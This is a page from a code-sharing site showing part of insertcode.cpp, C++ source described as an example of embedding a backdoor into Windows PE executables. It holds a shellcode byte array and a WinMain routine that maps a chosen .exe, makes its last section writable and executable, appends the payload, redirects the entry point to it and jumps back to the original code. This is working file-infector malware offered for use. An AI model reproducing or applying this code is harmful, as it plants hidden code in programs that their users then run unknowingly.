insertcode.cpp
来自「PE可执行文件的镶入式程序的编写方法及示例(镶入式后门程序&原程序) 由于Mic」· C++ 代码 · 共 565 行 · 第 1/2 页
CPP
565 行
"\x8B\x8D\x0C\xED\xFF\xFF\x83\xC1\x01\x89"
"\x8D\x0C\xED\xFF\xFF\x33\xD2\x85\xD2\x75"
"\xCF\x8D\x85\x24\xFE\xFF\xFF\x50\x6A\x00"
"\x6A\x00\x8D\x8D\x0C\xED\xFF\xFF\x51\x6A"
"\x00\xFF\x95\xC0\xBF\xFF\xFF\x89\x85\x10"
"\xEE\xFF\xFF\x83\xBD\x10\xEE\xFF\xFF\x00"
"\x0F\x84\xC8\x00\x00\x00\x83\xBD\x10\xEE"
"\xFF\xFF\xFF\x0F\x84\xBB\x00\x00\x00\x8D"
"\x95\x0C\xED\xFF\xFF\x52\x8B\x85\x08\xED"
"\xFF\xFF\x50\xFF\x95\xCC\xBF\xFF\xFF\x85"
"\xC0\x74\x21\x6A\x00\x68\x00\x10\x00\x00"
"\x8D\x8D\x18\xEE\xFF\xFF\x51\x8B\x95\x08"
"\xED\xFF\xFF\x52\xFF\x95\xBC\xBF\xFF\xFF"
"\x89\x85\x18\xFE\xFF\xFF\x83\xBD\x18\xFE"
"\xFF\xFF\x00\x77\x05\xE9\x56\x01\x00\x00"
"\x6A\x00\x8D\x85\x18\xFE\xFF\xFF\x50\x8B"
"\x8D\x18\xFE\xFF\xFF\x51\x8D\x95\x18\xEE"
"\xFF\xFF\x52\x8B\x85\x20\xFE\xFF\xFF\x50"
"\xFF\x95\xE4\xBF\xFF\xFF\x89\x85\x10\xEE"
"\xFF\xFF\x83\xBD\x10\xEE\xFF\xFF\x00\x75"
"\x05\xE9\x1C\x01\x00\x00\x83\xBD\x14\xEE"
"\xFF\xFF\x00\x75\x25\x6A\x00\x8D\x8D\x18"
"\xFE\xFF\xFF\x51\x6A\x01\x8D\x95\xC0\xEC"
"\xFF\xFF\x52\x8B\x85\x20\xFE\xFF\xFF\x50"
"\xFF\x95\xE4\xBF\xFF\xFF\x89\x85\x10\xEE"
"\xFF\xFF\x83\xBD\x10\xEE\xFF\xFF\x00\x75"
"\x05\xE9\xDE\x00\x00\x00\x68\x00\x10\x00"
"\x00\x6A\x00\x8D\x8D\x18\xEE\xFF\xFF\x51"
"\xFF\x95\x70\xBF\xFF\xFF\x83\xC4\x0C\x6A"
"\x00\x8D\x55\xFC\x52\x6A\x00\x6A\x00\x6A"
"\x00\x8B\x45\xC8\x50\xFF\x95\xE0\xBF\xFF"
"\xFF\x83\x7D\xFC\x00\x76\x5A\x6A\x00\x8D"
"\x8D\x18\xFE\xFF\xFF\x51\x8B\x55\xFC\x52"
"\x8D\x85\x18\xEE\xFF\xFF\x50\x8B\x4D\xC8"
"\x51\xFF\x95\xDC\xBF\xFF\xFF\x89\x85\x10"
"\xEE\xFF\xFF\x83\xBD\x10\xEE\xFF\xFF\x00"
"\x75\x02\xEB\x7A\x6A\x00\x8B\x55\xFC\x52"
"\x8D\x85\x18\xEE\xFF\xFF\x50\x8B\x8D\x08"
"\xED\xFF\xFF\x51\xFF\x95\xB8\xBF\xFF\xFF"
"\x89\x85\x10\xEE\xFF\xFF\x83\xBD\x10\xEE"
"\xFF\xFF\x00\x7F\x02\xEB\x4D\xE9\x1A\xFE"
"\xFF\xFF\x8B\x95\x20\xFE\xFF\xFF\x52\xFF"
"\x95\xF0\xBF\xFF\xFF\x8B\x45\xC8\x50\xFF"
"\x95\xF0\xBF\xFF\xFF\x8B\x4D\xD4\x51\xFF"
"\x95\xF0\xBF\xFF\xFF\x8B\x55\xCC\x52\xFF"
"\x95\xF0\xBF\xFF\xFF\x8B\x85\x08\xED\xFF"
"\xFF\x50\xFF\x95\xC4\xBF\xFF\xFF\x68\xE8"
"\x03\x00\x00\xFF\x95\xE8\xBF\xFF\xFF\xE9"
"\xDC\xFC\xFF\xFF\xEB\xB6\xEB\xB4\xEB\xB2"
"\xEB\xB0\xEB\xAE\x8B\xE5\x5D\xC3\x59\x51"
"\xC3\xE8\xF8\xFF\xFF\xFF\xC3\xB8";
char code1[]="\xFF\xE0\xFF\x25"; //jmp eax
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
HANDLE h_file,f_Map;
DWORD f_size,code_size,section_add,section_size,Secnumb,temp;
jmpaddr *add_jmp;
LPVOID f_Maddr,c_Maddr;
char * FilterStrings="Executable Files\0*.exe\0";
char of_Name[MAX_PATH],*pdest,*szBuffer;
int result,cm=' ';
OPENFILENAME ofn;
LONG len;
IMAGE_DOS_HEADER *h_dos;
IMAGE_NT_HEADERS *h_nt;
IMAGE_SECTION_HEADER *h_section;
//打开文件
szBuffer=GetCommandLine();
pdest = strchr( szBuffer, cm );
result = pdest - szBuffer + 1;
if( pdest != NULL )
{
strncpy( of_Name,szBuffer+result, strlen(szBuffer)-result);
if(strlen(of_Name)>3)
goto begin;
}
of_Name[0]=0;
FillMemory(&ofn,sizeof(OPENFILENAME),0);
ofn.lStructSize=sizeof(OPENFILENAME);
ofn.lpstrFilter=FilterStrings;
ofn.nFilterIndex=1;
ofn.lpstrFile=of_Name;
ofn.nMaxFile=MAX_PATH;
ofn.lpstrTitle="选择一个要更改的PE格式的可执行文件";
ofn.Flags=OFN_FILEMUSTEXIST;
if(GetOpenFileName(&ofn))
{
if(SetFileAttributes(of_Name,FILE_ATTRIBUTE_NORMAL)==NULL)
return 0;
}
else
return 0;
begin:
//把文件影射到内存
h_file=CreateFile(of_Name, GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL );
if(h_file==INVALID_HANDLE_VALUE)
return 0;
f_size=GetFileSize(h_file,NULL);
if(f_size>500000)
return 0;
code_size=sizeof(code)-1;
//要加入的代码长度
f_Map=CreateFileMapping(h_file, NULL,PAGE_READWRITE,0,f_size+code_size+30,0 );
if(f_Map==NULL)
{
CloseHandle(h_file);
return 0;
}
f_Maddr=MapViewOfFile(f_Map,FILE_MAP_WRITE,0,0,0 );
if(f_Maddr==NULL)
{
CloseHandle(f_Map);
CloseHandle(h_file);
return 0;
}
//检测是否pe文件
_asm
{
mov edx,f_Maddr
mov h_dos,edx
}
if(h_dos->e_magic==IMAGE_DOS_SIGNATURE )
{
len=h_dos->e_lfanew;
if(len>(long)f_size)
goto endop;
_asm
{
mov edx,h_dos
add edx,len
mov h_nt,edx
}
if( h_nt->Signature!=IMAGE_NT_SIGNATURE )
goto endop;
}
else
goto endop;
//找到最后一节
Secnumb=h_nt->FileHeader.NumberOfSections;
_asm
{
mov edx,h_nt
mov h_section,edx
}
len=sizeof(IMAGE_NT_HEADERS);
for(temp=0;temp<Secnumb;temp++)
{
_asm
{
mov edx,h_section
add edx,len
mov h_section,edx
}
//更改最后节的特性为0xc2000040
if(temp==Secnumb-1)
h_section->Characteristics=0xc2000040;
len=sizeof(IMAGE_SECTION_HEADER);
}
//检查文件大小和最后节的内存地址
_asm
{
mov edx,f_Maddr
add edx,f_size
mov c_Maddr,edx
}
section_add=h_section->PointerToRawData;
_asm
{
mov edx,c_Maddr
sub edx,f_Maddr
sub edx,section_add
mov section_add,edx
}
section_size=section_add-h_section->SizeOfRawData;
if(section_size>1000)
goto endop;
//加入代码在文件的结尾
memcpy((char*)c_Maddr,code,code_size);
//写入返回地址
_asm
{
mov edx,c_Maddr
add edx,code_size
mov add_jmp,edx
}
add_jmp->jmp=h_nt->OptionalHeader.AddressOfEntryPoint+h_nt->OptionalHeader.ImageBase;
memcpy((char*)c_Maddr+code_size+4,code1,4);
//计算代码的地址
h_nt->OptionalHeader.AddressOfEntryPoint=h_section->VirtualAddress+section_add;
//更改节尺寸
h_section->Misc.VirtualSize=h_section->SizeOfRawData+section_size+code_size;
h_section->SizeOfRawData=h_section->SizeOfRawData+section_size+code_size+30;
//节尺寸+代码长度如果超过内存影象还要计算OptionalHeader.SizeOfImage的大小
if(h_section->SizeOfRawData>h_section->Misc.VirtualSize)
if(h_section->SizeOfRawData>0x1000)
while(h_section->VirtualAddress+h_section->Misc.VirtualSize>h_nt->OptionalHeader.SizeOfImage)
h_nt->OptionalHeader.SizeOfImage=h_nt->OptionalHeader.SizeOfImage+0x1000;
endop:
UnmapViewOfFile( f_Maddr);
CloseHandle(f_Map);
CloseHandle(h_file);
return 0;
}⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?